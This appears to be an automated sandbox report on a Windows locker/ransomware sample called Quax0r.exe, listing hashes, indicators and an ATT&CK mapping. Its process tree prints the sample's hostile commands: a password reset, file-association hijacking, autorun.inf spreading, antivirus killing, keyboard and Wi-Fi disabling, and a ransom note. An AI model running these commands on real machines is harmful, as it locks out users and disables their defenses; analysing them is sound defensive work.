cd1bb0b84729b272e28a48cdfc22ef1f2577e4a1779a9fe871e54cf71707ded8

General

Target

Quax0r.exe
Size

16KB
MD5

779b96f25a5c23fb88062503290e69ce
SHA1

1d3b85c38418d296ced87fb7155e40aad8cb0773
SHA256

cd1bb0b84729b272e28a48cdfc22ef1f2577e4a1779a9fe871e54cf71707ded8
SHA512

7ac94fb7d832302f0aba124f41e168d00e1b3567ff88b7938c25cfb4dd72539e80b56862abf65be99f800d2dec034dbab56be3d5021175a314beee65def9ce3a

Score

7^/10

spyware stealer

Malware Config

Signatures

Drops startup file 1 IoCs

Processes:

Quax0r.exe

description ioc process

File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini Quax0r.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini	Quax0r.exe

Drops desktop.ini file(s) 23 IoCs

Processes:

Quax0r.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini	Quax0r.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\History\desktop.ini	Quax0r.exe
File created	C:\Users\Admin\Videos\desktop.ini	Quax0r.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini	Quax0r.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini	Quax0r.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SendTo\desktop.ini	Quax0r.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini	Quax0r.exe
File created	C:\Users\Admin\Desktop\desktop.ini	Quax0r.exe
File created	C:\Users\Admin\Music\desktop.ini	Quax0r.exe
File created	C:\Users\Admin\Pictures\desktop.ini	Quax0r.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini	Quax0r.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\desktop.ini	Quax0r.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini	Quax0r.exe
File created	C:\Users\Admin\Favorites\desktop.ini	Quax0r.exe
File created	C:\Users\Admin\Favorites\Links\desktop.ini	Quax0r.exe
File created	C:\Users\Admin\Pictures\Saved Pictures\desktop.ini	Quax0r.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\AccountPictures\desktop.ini	Quax0r.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\desktop.ini	Quax0r.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini	Quax0r.exe
File created	C:\Users\Admin\Pictures\Camera Roll\desktop.ini	Quax0r.exe
File created	C:\Program Files (x86)\desktop.ini	Quax0r.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Quax0r.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini	Quax0r.exe

Drops autorun.inf file 1 TTPs
Malware can abuse Windows Autorun to spread further via attached volumes.

Replication Through Removable Media
T1091

Drops file in Program Files directory 64 IoCs

Processes:

Quax0r.exe

description	ioc	process
File created	C:\Program Files (x86)\Windows Media Player\fr-FR\mpvis.dll.mui	Quax0r.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\es-es\ui-strings.js	Quax0r.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\am_get.svg	Quax0r.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeUpdate_bk\1.3.147.37\msedgeupdateres_pl.dll	Quax0r.exe
File opened for modification	C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\fr\Microsoft.PackageManagement.MetaProvider.PowerShell.resources.dll	Quax0r.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_nextarrow_default.svg	Quax0r.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeUpdate_bk\1.3.147.37\msedgeupdateres_sk.dll	Quax0r.exe
File created	C:\Program Files (x86)\Windows Media Player\Media Renderer\DMR_48.png	Quax0r.exe
File created	C:\Program Files (x86)\Common Files\System\fr-FR\wab32res.dll.mui	Quax0r.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\tr-tr\ui-strings.js	Quax0r.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\images\icons_ie8.gif	Quax0r.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\es-es\PlayStore_icon.svg	Quax0r.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\illustrations_retina.png	Quax0r.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\ccloud.png	Quax0r.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\themes\dark\rhp_world_icon.png	Quax0r.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\it-it\ui-strings.js	Quax0r.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\sv-se\ui-strings.js	Quax0r.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\WidevineCdm\manifest.json.DATA	Quax0r.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\nl-nl\ui-strings.js	Quax0r.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themeless\protect_poster.jpg	Quax0r.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\images\dd_arrow_small.png	Quax0r.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\SearchEmail.png	Quax0r.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\A12_Spinner_int.gif	Quax0r.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\AddressBook2x.png	Quax0r.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\cs-cz\ui-strings.js	Quax0r.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\VisualElements\SmallLogo.png.DATA	Quax0r.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\themes\dark\cloud_icon.png	Quax0r.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\es-es\ui-strings.js	Quax0r.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\sk-sk\ui-strings.js	Quax0r.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\themes\dark\s_shared_single_filetype.svg	Quax0r.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\de_get.svg	Quax0r.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-H	Quax0r.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Locales\ga.pak	Quax0r.exe
File created	C:\Program Files (x86)\Windows Photo Viewer\fr-FR\ImagingDevices.exe.mui	Quax0r.exe
File created	C:\Program Files (x86)\Common Files\Microsoft Shared\ink\it-IT\InkObj.dll.mui	Quax0r.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\pmd.cer	Quax0r.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\illustrations.png	Quax0r.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\hr.pak.DATA	Quax0r.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\adobe_spinner_mini.gif	Quax0r.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\ind_prog.gif	Quax0r.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Locales\sl.pak	Quax0r.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\ru-ru\ui-strings.js	Quax0r.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\en_get.svg	Quax0r.exe
File created	C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.0\ja\System.Speech.resources.dll	Quax0r.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\cs-cz\ui-strings.js	Quax0r.exe
File created	C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.0\de\PresentationBuildTasks.resources.dll	Quax0r.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\pt-br\ui-strings.js	Quax0r.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\plugin.js	Quax0r.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\pl-pl\ui-strings.js	Quax0r.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\selector.js	Quax0r.exe
File created	C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.5\ja\System.Windows.Presentation.resources.dll	Quax0r.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\AppCenter_R.aapp	Quax0r.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\fi-fi\ui-strings.js	Quax0r.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\ui-strings.js	Quax0r.exe
File created	C:\Program Files (x86)\Common Files\Microsoft Shared\ink\ja-JP\TipRes.dll.mui	Quax0r.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\faf-main.js	Quax0r.exe
File created	C:\Program Files (x86)\Microsoft\EdgeUpdate_bk\EdgeUpdate.dat.LOG2	Quax0r.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\close_x.png	Quax0r.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\fullscreen-press.svg	Quax0r.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\multi-tab-file-view.png	Quax0r.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\pl-pl\ui-strings.js	Quax0r.exe
File created	C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.0\PresentationFramework.Luna.dll	Quax0r.exe
File created	C:\Program Files (x86)\Windows Defender\it-IT\MpAsDesc.dll.mui	Quax0r.exe
File opened for modification	C:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\10.0\VSTOMessageProvider.dll	Quax0r.exe

Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

4716 taskkill.exe

pid	process
4716	taskkill.exe

Modifies registry class 8 IoCs

Processes:

cmd.execmd.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.txt	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.txt\ = "txtfile"	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.exe	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.exe\ = "RozbehOfSatanFile "	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.bat	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "RozbehOfSatanFile "	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.cmd	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "RozbehOfSatanFile"	cmd.exe

Runs net.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

taskkill.exe

description pid process

Token: SeDebugPrivilege 4716 taskkill.exe

description	pid	process
Token: SeDebugPrivilege	4716	taskkill.exe

Suspicious use of WriteProcessMemory 36 IoCs

Processes:

Quax0r.execmd.exenet.execmd.execmd.exe

description	pid	process	target process
PID 1572 wrote to memory of 2216	1572	Quax0r.exe	cmd.exe
PID 1572 wrote to memory of 2216	1572	Quax0r.exe	cmd.exe
PID 1572 wrote to memory of 2216	1572	Quax0r.exe	cmd.exe
PID 1572 wrote to memory of 392	1572	Quax0r.exe	cmd.exe
PID 1572 wrote to memory of 392	1572	Quax0r.exe	cmd.exe
PID 1572 wrote to memory of 392	1572	Quax0r.exe	cmd.exe
PID 1572 wrote to memory of 3988	1572	Quax0r.exe	cmd.exe
PID 1572 wrote to memory of 3988	1572	Quax0r.exe	cmd.exe
PID 1572 wrote to memory of 3988	1572	Quax0r.exe	cmd.exe
PID 1572 wrote to memory of 4112	1572	Quax0r.exe	cmd.exe
PID 1572 wrote to memory of 4112	1572	Quax0r.exe	cmd.exe
PID 1572 wrote to memory of 4112	1572	Quax0r.exe	cmd.exe
PID 1572 wrote to memory of 4472	1572	Quax0r.exe	cmd.exe
PID 1572 wrote to memory of 4472	1572	Quax0r.exe	cmd.exe
PID 1572 wrote to memory of 4472	1572	Quax0r.exe	cmd.exe
PID 1572 wrote to memory of 2916	1572	Quax0r.exe	cmd.exe
PID 1572 wrote to memory of 2916	1572	Quax0r.exe	cmd.exe
PID 1572 wrote to memory of 2916	1572	Quax0r.exe	cmd.exe
PID 2216 wrote to memory of 3872	2216	cmd.exe	net.exe
PID 2216 wrote to memory of 3872	2216	cmd.exe	net.exe
PID 2216 wrote to memory of 3872	2216	cmd.exe	net.exe
PID 3872 wrote to memory of 4728	3872	net.exe	net1.exe
PID 3872 wrote to memory of 4728	3872	net.exe	net1.exe
PID 3872 wrote to memory of 4728	3872	net.exe	net1.exe
PID 2916 wrote to memory of 4716	2916	cmd.exe	taskkill.exe
PID 2916 wrote to memory of 4716	2916	cmd.exe	taskkill.exe
PID 2916 wrote to memory of 4716	2916	cmd.exe	taskkill.exe
PID 4472 wrote to memory of 4840	4472	cmd.exe	netsh.exe
PID 4472 wrote to memory of 4840	4472	cmd.exe	netsh.exe
PID 4472 wrote to memory of 4840	4472	cmd.exe	netsh.exe
PID 1572 wrote to memory of 2504	1572	Quax0r.exe	cmd.exe
PID 1572 wrote to memory of 2504	1572	Quax0r.exe	cmd.exe
PID 1572 wrote to memory of 2504	1572	Quax0r.exe	cmd.exe
PID 1572 wrote to memory of 1276	1572	Quax0r.exe	cmd.exe
PID 1572 wrote to memory of 1276	1572	Quax0r.exe	cmd.exe
PID 1572 wrote to memory of 1276	1572	Quax0r.exe	cmd.exe

C:\Users\Admin\AppData\Local\Temp\Quax0r.exe
"C:\Users\Admin\AppData\Local\Temp\Quax0r.exe"
1⤵
- Drops startup file
- Drops desktop.ini file(s)
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:1572

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net users %username% LOCKEDBYROZBEHOFSATAN
2⤵
- Suspicious use of WriteProcessMemory
PID:2216

C:\Windows\SysWOW64\net.exe
net users Admin LOCKEDBYROZBEHOFSATAN
3⤵
- Suspicious use of WriteProcessMemory
PID:3872

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 users Admin LOCKEDBYROZBEHOFSATAN
4⤵
PID:4728

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c assoc .exe=RozbehOfSatanFile && assoc .bat=RozbehOfSatanFile && assoc .cmd=RozbehOfSatanFile
2⤵
- Modifies registry class
PID:392

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c echo ^[autorun^] > ..\\autorun.inf
2⤵
PID:3988

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /im chrome.exe /f && taskkill /im WireShark.exe /f && taskkill /im MSASCUI.exe /f && taskkill /im taskmgr.exe /f && taskkill /im regedit.exe /f && taskkill /im Kaspersky.exe /f && taskkill /im msseces.exe /f && taskkill /im nod32.exe /f && taskkill /im msmpeng.exe /f && taskkill /im navapsvc.exe /f && taskkill /im avkwctl.exe /f && taskkill /im fsav32.exe /f && rundll32 keyboard,disable
2⤵
- Suspicious use of WriteProcessMemory
PID:2916

C:\Windows\SysWOW64\taskkill.exe
taskkill /im chrome.exe /f
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4716

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c netsh Interface Set Interface Wi-Fi 12 disable
2⤵
- Suspicious use of WriteProcessMemory
PID:4472

C:\Windows\SysWOW64\netsh.exe
netsh Interface Set Interface Wi-Fi 12 disable
3⤵
PID:4840

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c echo open^=WindowsScan^.exe >> ..\\autorun.inf
2⤵
PID:4112

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c color CF && @echo off && cls && echo All files have been encrypted by NominatusCrypto ( Quax0r ) contact the creator of this virus on discord Nominatus#9251 for more information if you restart then your account will be useless! files cannot be decrypted without paying the ransom to the creator!! live or die? make your choice now! && pause > nul
2⤵
PID:1276

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c assoc .txt=txtfile
2⤵
- Modifies registry class
PID:2504

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Replication Through Removable Media

1

T1091

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Credentials in Files

1

T1081

Discovery

Lateral Movement

Replication Through Removable Media

1

T1091

Collection

Data from Local System

1

T1005

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\autorun.inf
Filesize
35B

MD5
261490e22651f58aeb72b82b148f1e02

SHA1
f180054e9592561288db216c9fb156a99ad5830f

SHA256
b12b5eb5be8ef735ed43076e438f438a34adf362a27b187aeba422a4e831b4ba

SHA512
83edf93509d5cc5f275c5877bcf571cf5a8716df603783155bb88338008d409ff5041dfb040253c400750e000e51c9eb8c26cb714cd06186ab9b00fc44b2769c

Download Submit
C:\Users\Admin\AppData\Local\autorun.inf
Filesize
35B

MD5
261490e22651f58aeb72b82b148f1e02

SHA1
f180054e9592561288db216c9fb156a99ad5830f

SHA256
b12b5eb5be8ef735ed43076e438f438a34adf362a27b187aeba422a4e831b4ba

SHA512
83edf93509d5cc5f275c5877bcf571cf5a8716df603783155bb88338008d409ff5041dfb040253c400750e000e51c9eb8c26cb714cd06186ab9b00fc44b2769c

Download Submit
memory/392-137-0x0000000000000000-mapping.dmp

Download
memory/1276-148-0x0000000000000000-mapping.dmp

Download
memory/1572-133-0x0000000005350000-0x00000000053E2000-memory.dmp

Filesize
584KB

Download
memory/1572-135-0x00000000055F0000-0x0000000005646000-memory.dmp

Filesize
344KB

Download
memory/1572-134-0x0000000005250000-0x000000000525A000-memory.dmp

Filesize
40KB

Download
memory/1572-130-0x00000000008B0000-0x00000000008BC000-memory.dmp

Filesize
48KB

Download
memory/1572-132-0x0000000005900000-0x0000000005EA4000-memory.dmp

Filesize
5.6MB

Download
memory/1572-131-0x00000000052B0000-0x000000000534C000-memory.dmp

Filesize
624KB

Download
memory/2216-136-0x0000000000000000-mapping.dmp

Download
memory/2504-147-0x0000000000000000-mapping.dmp

Download
memory/2916-141-0x0000000000000000-mapping.dmp

Download
memory/3872-142-0x0000000000000000-mapping.dmp

Download
memory/3988-138-0x0000000000000000-mapping.dmp

Download
memory/4112-139-0x0000000000000000-mapping.dmp

Download
memory/4472-140-0x0000000000000000-mapping.dmp

Download
memory/4716-145-0x0000000000000000-mapping.dmp

Download
memory/4728-143-0x0000000000000000-mapping.dmp

Download
memory/4840-146-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads